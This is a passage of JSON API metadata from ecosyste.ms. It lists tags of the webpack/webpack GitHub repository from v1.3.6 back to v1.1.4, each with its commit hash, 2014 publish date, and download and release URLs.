s/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.6/manifests"},{"name":"v1.3.5","sha":"382635d711081fb6fedb75719e4c7f0e1e40f766","kind":"commit","published_at":"2014-08-25T08:45:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.5/manifests"},{"name":"v1.3.4","sha":"b9ac3fa3c77d64856503013a7262efd5b368a199","kind":"commit","published_at":"2014-08-25T08:20:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.4/manifests"},{"name":"v1.3.3-beta2","sha":"2a419ccbeab05d91a9f14fa6ac1e2037678d8f29","kind":"commit","published_at":"2014-08-14T09:34:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.3-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.3-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.3-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta2/manifests"},{"name":"v1.3.3-beta1","sha":"5a447ad7c39b63c037f56daf6df7d1df9074d1c8","kind":"commit","published_at":"2014-08-03T19:37:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.3-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.3-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.3-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta1/manifests"},{"name":"v1.3.2-beta9","sha":"a7d7c4ca2fb245d22fa98944d32acfff4746ac44","kind":"commit","published_at":"2014-07-28T22:15:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta9/manifests"},{"name":"v1.3.2-beta8","sha":"18ad6548134d5ff40fd04633e8e1375ddb005cc1","kind":"commit","published_at":"2014-07-26T15:54:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta8/manifests"},{"name":"v1.3.2-beta7","sha":"0dd1a69b97161df01a6bdd41d5f32bb4135af50a","kind":"commit","published_at":"2014-07-26T12:48:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta7/manifests"},{"name":"v1.3.2-beta6","sha":"7f6f44df1bb9ca055ac0eaed89aa0dca4e8dc6fa","kind":"commit","published_at":"2014-07-24T15:54:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta6/manifests"},{"name":"v1.3.2-beta5","sha":"cca21ee10756dbb8edb6fb283391f304a197295f","kind":"commit","published_at":"2014-07-24T13:08:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta5/manifests"},{"name":"v1.3.2-beta4","sha":"8d90c0f5b5998ebaf3e61ac443ec01a223d456e9","kind":"commit","published_at":"2014-07-23T12:42:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta4/manifests"},{"name":"v1.3.2-beta3","sha":"d76600101ccc5aef0be148909a336baf3d2ccfce","kind":"commit","published_at":"2014-07-19T12:35:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta3/manifests"},{"name":"v1.3.2-beta2","sha":"9d4cbb125445f4c2bb99c5b55a16c3255ae1d247","kind":"commit","published_at":"2014-07-18T11:32:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta2/manifests"},{"name":"v1.3.2-beta1","sha":"0ab5a3e993386b54afab416b5bc02747658469e6","kind":"commit","published_at":"2014-07-17T00:06:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta1/manifests"},{"name":"v1.3.1-beta9","sha":"53c38582e6ceb31aefab5237b042148dd6712151","kind":"commit","published_at":"2014-07-16T18:57:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta9/manifests"},{"name":"v1.3.1-beta8","sha":"6c50e7c3883ac24c4f3dcd7b8a11f9545c230589","kind":"commit","published_at":"2014-07-09T11:37:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta8/manifests"},{"name":"v1.3.1-beta7","sha":"287984cb54ed896c85778dc1874ec05195b99a11","kind":"commit","published_at":"2014-07-07T11:22:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta7/manifests"},{"name":"v1.3.1-beta6","sha":"5113a81dd9cdbf35cb104e50480b4c858105b795","kind":"commit","published_at":"2014-07-04T11:02:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta6/manifests"},{"name":"v1.3.1-beta5","sha":"197d2f2efa9e42836efe3f0f62c04c58b981a745","kind":"commit","published_at":"2014-07-02T22:00:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta5/manifests"},{"name":"v1.3.1-beta4","sha":"68cc2c6e03d1326bc0c69cab5b1faf7145e1e195","kind":"commit","published_at":"2014-06-23T22:46:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta4/manifests"},{"name":"v1.3.1-beta3","sha":"93beeacdf8e45970349006dc589c8e73b013e832","kind":"commit","published_at":"2014-06-18T21:03:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta3/manifests"},{"name":"v1.3.1-beta2","sha":"af55e54271c5961e6d1bf57b485f5a5463bb5a7f","kind":"commit","published_at":"2014-06-18T09:12:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta2/manifests"},{"name":"v1.3.1-beta1","sha":"8c2327e0b7863853a45ef094dbb8ded520e0314f","kind":"commit","published_at":"2014-06-17T20:46:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta1/manifests"},{"name":"v1.3.0-beta9","sha":"419eb4dfd9d7ed8ad16688874e33bbe57617e2d8","kind":"commit","published_at":"2014-06-17T20:40:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta9/manifests"},{"name":"v1.3.0-beta8","sha":"d3db09f72066ee23ec241f33ad6dfb00d42e8582","kind":"commit","published_at":"2014-06-12T04:31:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta8/manifests"},{"name":"v1.3.0-beta7","sha":"46a918f5682ec766bc21424311f16fe28bcd8892","kind":"commit","published_at":"2014-06-11T20:52:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta7/manifests"},{"name":"v1.3.0-beta6","sha":"20ad2baf9afd6a8d4e969e9ee094994c7b11905b","kind":"commit","published_at":"2014-06-11T20:26:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta6/manifests"},{"name":"v1.3.0-beta5","sha":"8bfb752c526ef612b2011c7bc266b7adb7a8fcb7","kind":"commit","published_at":"2014-06-05T17:54:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta5/manifests"},{"name":"v1.3.0-beta4","sha":"56e7073abbfec4b920bf1dffb0924027072d0c4e","kind":"commit","published_at":"2014-06-05T07:31:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta4/manifests"},{"name":"v1.3.0-beta3","sha":"5cfd4138d682139af7069342aa66e0495070db9b","kind":"commit","published_at":"2014-06-04T06:48:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta3/manifests"},{"name":"v1.3.0-beta2","sha":"560762a932475e21e68577ba33f9482d738f1edc","kind":"commit","published_at":"2014-06-03T06:45:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta2/manifests"},{"name":"v1.3.0-beta1","sha":"ebac371b7228a04fab834260208d157c5333df0f","kind":"commit","published_at":"2014-06-02T22:19:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta1/manifests"},{"name":"v1.2.0-beta6","sha":"fc6d418e3d5bd0bc6356e82850173c33c52a567a","kind":"commit","published_at":"2014-05-27T09:54:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta6/manifests"},{"name":"v1.2.0-beta5","sha":"2b6bfde9d5d634e47558c6f6b8589622a1fb6062","kind":"commit","published_at":"2014-05-26T21:54:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta5/manifests"},{"name":"v1.2.0-beta4","sha":"4ead6596a9a96dcde6f827ce1dce77c36701f113","kind":"commit","published_at":"2014-05-26T10:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta4/manifests"},{"name":"v1.2.0-beta3","sha":"36803b52719fa8f07d21c5fbab90f26a8b1f2bed","kind":"commit","published_at":"2014-05-22T10:17:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta3/manifests"},{"name":"v1.2.0-beta2","sha":"8ddfa0a950520306bb8694071d168a0d2a7a18a2","kind":"commit","published_at":"2014-05-21T16:34:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta2/manifests"},{"name":"v1.2.0-beta1","sha":"943a17c027279833e03a1b62fa60417cf4a5a5ac","kind":"commit","published_at":"2014-05-21T05:49:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta1/manifests"},{"name":"v1.1.11","sha":"2898f870eaeefcf0b60885743df8da9362883d63","kind":"commit","published_at":"2014-05-16T23:00:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.11/manifests"},{"name":"v1.1.10","sha":"7824ed8e29961197f3d74a755820f7b31fa01b5b","kind":"commit","published_at":"2014-05-08T16:44:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.10/manifests"},{"name":"v1.1.9","sha":"613e6a0bd0b4ca24791d01b3131b98533e33ff3a","kind":"commit","published_at":"2014-05-08T07:35:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.9/manifests"},{"name":"v1.1.8","sha":"adf3108a785630cd46daff093a80eb78f507a3a5","kind":"commit","published_at":"2014-04-19T19:36:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.8/manifests"},{"name":"v1.1.7","sha":"0ed9c759926ac0f7ec9be10643522657c6b4af53","kind":"commit","published_at":"2014-04-17T07:56:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.7/manifests"},{"name":"v1.1.6","sha":"504cb48e8fbd298fc6fa89f4fce99f30f8c072d1","kind":"commit","published_at":"2014-04-17T06:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.6/manifests"},{"name":"v1.1.5","sha":"32df8b73092c4fb59965f14ff833dfe70ba4940e","kind":"commit","published_at":"2014-04-09T07:12:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.5/manifests"},{"name":"v1.1.4","sha":"d6aa7b1388a3fe4b1a3b146a4986bb2b5ea99d03","kind":"commit","published_at":"2014-04-05T16:11:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.4","html_url":"https://github.com/webpack/webpac